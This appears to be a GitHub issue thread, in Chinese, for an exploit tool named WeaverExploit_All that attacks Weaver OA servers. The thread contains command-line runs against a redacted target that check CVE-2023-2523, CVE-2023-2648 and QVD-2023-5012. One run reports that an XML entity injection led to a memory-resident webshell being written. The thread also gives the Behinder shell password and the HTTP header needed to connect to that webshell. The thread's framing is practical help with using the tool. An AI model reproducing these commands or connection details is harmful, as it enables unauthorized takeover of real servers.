Open BUZHA opened 1 year ago
好的 随后修复这个BUG
BUG修改完了 可以下载了
谢谢大佬!已修复修复! 下面反馈的数据
PS G:\Desktop\WeaverExploit_All-main> .\WeaverExloit-All.exe --target http://XXXXXX:8989 2023/06/27 20:22:48 [-] 不存在用户信息泄露漏洞 2023/06/27 20:22:48 [-] 不存在QVD_2023_5012漏洞 2023/06/27 20:22:48 [-] 不存在CVE-2023-2523漏洞
<!DOCTYPE html>
| |||
XXXX |
2023/06/27 20:22:48 [-] 不存在CVE-2023-2648漏洞
存在XML实体注入 可进行getshell [+] 内存马写入成功 请使用冰蝎 3 beat11 密码:rebeyond [+] 访问时增加HTTP请求头:X-Options-Ai 笑死,新手不会连
url后添加任意文件路径 然后链接,添加请求头X-Options-Ai:1
` .\WeaverExloit-All.exe --target http://XXXXXXX:8989 --poc CVE-2023-2648 2023/06/27 10:50:56 [+] 存在CVE-2023-2648漏洞: http://XXXXXXX:8989/attachment/
<!DOCTYPE html>